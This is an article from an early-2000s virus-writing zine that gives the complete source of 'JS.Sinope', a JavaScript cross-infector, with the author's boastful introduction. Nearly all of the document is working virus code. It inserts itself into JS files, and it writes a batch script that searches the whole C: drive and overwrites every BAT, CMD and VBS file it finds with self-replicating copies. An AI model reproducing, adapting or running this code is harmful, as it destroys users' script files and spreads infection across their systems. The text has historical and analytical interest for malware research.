Redemption
| Last article | Table of contents | Next article |
|---|
| Last article | Table of contents | Next article |
|---|
JS.Sinope by Second Part To Hell
www.spth.de.vu
written from may 2003 to 23 june 2003
Austria
This is a JavaScript cross infector. It infects JS files anywhere in the middle
of the code and it overwrites BAT and VBS files with a file, that contains the
javascript code of the virus and that makes a new file and runs it. It was hell
to write, because I could not use any special sign for JavaScript or Visual Basic
Script (chr(34)<--["]) or Batch (chr(37)<--[%], chr(60)<--[<], chr(62)<--[>])
because the program would stop without doing anything but showing an error message.
Because of that I had to define them at the start of the code. To infect JS files
it searches for the sting 'function' in the victim code, and includes itself before
that code. And at the beginning of the code it calls the virus-function. To infect BAT
and VBS files it just overwrites its victims. All in all, I'm very proud that I'm
the author of this virus. :)
General Virus Information:
VirusName.................... JS.Sinope
VirusAuthor.................. Second Part To Hell[rRlf]
Infection Way................ Infects JS files anywhere in the
middle of the code, and overwrites
VBS and BAT files with the new generated
file, that makes a new file with the original
viruscode and runs it.
Payload...................... No
EPO.......................... Yes
Cross Infector............... Yes
VBS files.................. Yes
BAT files.................. Yes
CMD files.................. Yes
At the end of my introduction I hope that you like my virus, any you will learn
something from it. Yes, there are things to learn from ;). I'm sure, that there
is no other .VBS / .JS (EPO) / .BAT / .CMD infector with just 40 lines out there.
OK, now look at the code and become crazy. (Like I!!!) :D
Final Note: There are 2 empty lines at the end of the virus. That's important,
otherwise it would not work!!!
-------------------------------------[JS.Sinope]-------------------------------------
Sinope()
function Sinope() {
var fso=WScript.CreateObject('Scripting.FileSystemObject')
var shell=WScript.CreateObject('WScript.Shell')
big=String.fromCharCode(62);
small=String.fromCharCode(60);
comma=String.fromCharCode(34);
percent=String.fromCharCode(37);
nl=String.fromCharCode(13)+String.fromCharCode(10);
myfile=fso.OpenTextFile(WScript.ScriptFullName); mycode='';
eval('for (i=0; i'+small+'500; i++) { code=myfile.ReadLine(); if (code=='+comma+'function Sinope() {'+comma+') { for (j=1; j'+small+'40; j++) { mycode+=code+nl; code=myfile.ReadLine(); i=666; } } }')
sino=fso.CreateTextFile('sinope.tmp').Write(mycode)
bat=fso.CreateTextFile('sinope.bat')
bat.WriteLine('cls'+nl+'@echo off'+nl+'echo Sinope()'+big+'javascript.js')
my=fso.OpenTextFile('sinope.tmp')
eval('for (i=0; i'+small+'1; i++) { mlc=my.ReadLine(); if (mlc!='+comma+'// End'+comma+') { i--; bat.WriteLine('+comma+'echo '+comma+'+mlc+big+big+'+comma+' javascript.js'+comma+'); } }')
bat.WriteLine('echo // End'+big+big+'javascript.js'+nl+'echo.'+big+big+'javascript.js'+nl+'echo.'+big+big+'javascript.js'+nl+'cscript javascript.js')
bat.Close(); my.Close();
vbsfile=fso.CreateTextFile('sinope.vbs')
vbsfile.WriteLine('set fso=WScript.CreateObject('+comma+'Scripting.FileSystemObject'+comma+')'+nl+'set shell=WScript.CreateObject('+comma+'WScript.Shell'+comma+')'+nl+'set a=fso.CreateTextFile('+comma+'javas.js'+comma+')'+nl+'a.WriteLine'+comma+'Sinope()'+comma)
my=fso.OpenTextFile('sinope.tmp')
eval('for (i=0; i'+small+'1; i++) { mlc=my.ReadLine(); if (mlc!='+comma+'// End'+comma+') { i--; vbsinclude(mlc) } }')
vbsfile.WriteLine('a.WriteLine '+comma+'// End'+comma+'+chr(13)+chr(10)+chr(13)+chr(10)+chr(13)+chr(10)'+nl+'a.Close'+nl+'shell.Run'+comma+'javas.js'+comma)
infsearch=fso.CreateTextFile('search.bat')
infsearch.WriteLine('cls'+nl+'@echo off'+nl+'assoc .cmd'+nl+'if errorlevel 1 goto bat'+nl+'for /r C:\ '+percent+percent+'a in (*.bat) do copy sinope.bat '+percent+percent+'a'+nl+'for /r C:\ '+percent+percent+'b in (*.cmd) do copy sinope.bat '+percent+percent+'b'+nl+'for /r C:\ '+percent+percent+'c in (*.vbs) do copy sinope.vbs '+percent+percent+'c'+nl+'echo.'+big+'js.lst'+nl+'for /r C:\ '+percent+percent+'d in (*.js) do echo '+percent+percent+'d '+big+big+'js.lst'+nl+'echo end'+big+big+'js.lst'+nl+'goto :EOF'+nl+':bat')
infsearch.Close(); my.Close();
shell.Run('search.bat')
eval('for (i=0; i'+small+'3000000; i++) { i--; i++; }')
javf=fso.OpenTextFile('js.lst')
eval('for (i=0; i'+small+'1; i++) { javline=javf.ReadLine(); if (javline!='+comma+'end'+comma+') { i--; if (fso.FileExists(javline)) { infjs(javline) } } }') }
function vbsinclude(mlc) {
vbsfile.WriteLine('a.WriteLine'+comma+mlc+comma) }
function infjs(victimname) {
var fso=WScript.CreateObject('Scripting.FileSystemObject'); var vicall=fso.OpenTextFile(victimname).ReadAll()
var victim=fso.OpenTextFile(victimname)
var vcode=''; var viccodes=''; vsearch='FUNCTION';
eval('for (i=0; i'+small+'vicall.length; i++) { vcode=victim.Read(1);'+nl+'if (vcode.toUpperCase()=='+comma+'F'+comma+') { for (j=1; j'+small+'8; j++) { vcode+=victim.Read(1); if (vcode.toUpperCase() !=vsearch.substring(0,j+1)) { j=666 }; i++; } }'+nl+'if (vcode.toUpperCase()==vsearch) { i=vicall.lenght+666 }'+nl+'if (vcode.toUpperCase()!=vsearch) { viccodes+=vcode } }')
virinc=fso.OpenTextFile(victimname, 2).Write('Sinope()'+nl+viccodes+nl+mycode+nl+'function'+victim.ReadAll()); victim.Close();
}
// End
-------------------------------------[End of JS.Sinope]-------------------------------------